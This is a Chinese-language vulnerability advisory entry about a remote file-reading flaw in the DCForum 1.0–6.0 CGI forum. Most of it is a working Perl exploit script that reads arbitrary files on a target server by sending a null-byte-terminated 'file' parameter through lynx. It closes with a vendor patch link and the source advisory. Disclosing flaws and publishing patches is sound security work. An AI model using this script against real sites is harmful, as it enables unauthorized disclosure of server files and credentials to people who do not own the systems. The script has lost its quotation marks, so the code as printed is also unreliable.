DCForum文件泄漏漏洞
2005-08-11
系统编号:
WAVDB-00030
影响版本:
DCForum 1.0 - 6.0
程序介绍:
Dcforum是http://www.dcscripts.com提供的一个论坛CGI程序。
漏洞分析:
它的/dcforum/dcboard.cgi缺乏对用户输入变量的正确检查,导致攻击者可以用web server运行身份(通常是nobody)查看任意文件。
漏洞利用:
#!/usr/bin/perl
# DC Forum Vulnerablitiy(Found In Versions From 1.0 - 6.0 According To
CGISecurity.com Advisory)
# Exploits Vulnerability That Allows Remote File Reading
# By SteeLe
# BEGIN { open(STDERR, >errors.txt ); } error checking
$lynx = /usr/bin/lynx ; # specify
$site = $ARGV[0];
$cgi = $ARGV[1];
$inet = inet_aton($site);
die \n\t--- Usage:$0 <site> <cgi location,duh> --- if(@ARGV == '0' ||
@ARGV < 2);
print \n\t--- DCForum 1.0 - 6.0 Exploit --- ;
print \n\t--- By the cool fellas at * ---\n\n ;
while(true) { # yea i think I stole this from the pollex.pl , uh thanks.
print [dcforum]Option: ;
$action = <STDIN>;
chomp($action);
print Valid Options: r(read files, usage r <file>), q(quit)\n if($action
ne r || $action ne q );
if ($action eq r ) {
print \nFile(to read): ;
$file = <STDIN>;
chomp($file);
# Old fashion shit, and I was lazy so be happy
$url = ?az=list&file=$file%00 ;
$site = `$lynx http://$site$cgi$url`;
print $site;
}
elsif ($action eq q ) {
print now exiting program\n ;
exit;
}
}
# (c) 2000 [Warez To Tha Extreme(Damn Thats A Lie)]
解决方案:
厂商补丁:
Dcscripts
-----------
目前厂商已经提供了补丁下载:
http://www.dcscripts.com/dcforum/dcfNews/124.html
信息来源:
<*来源:admin@cgisecurity.com
相关链接:http://www.cgisecurity.com/advisory/2.txt
*>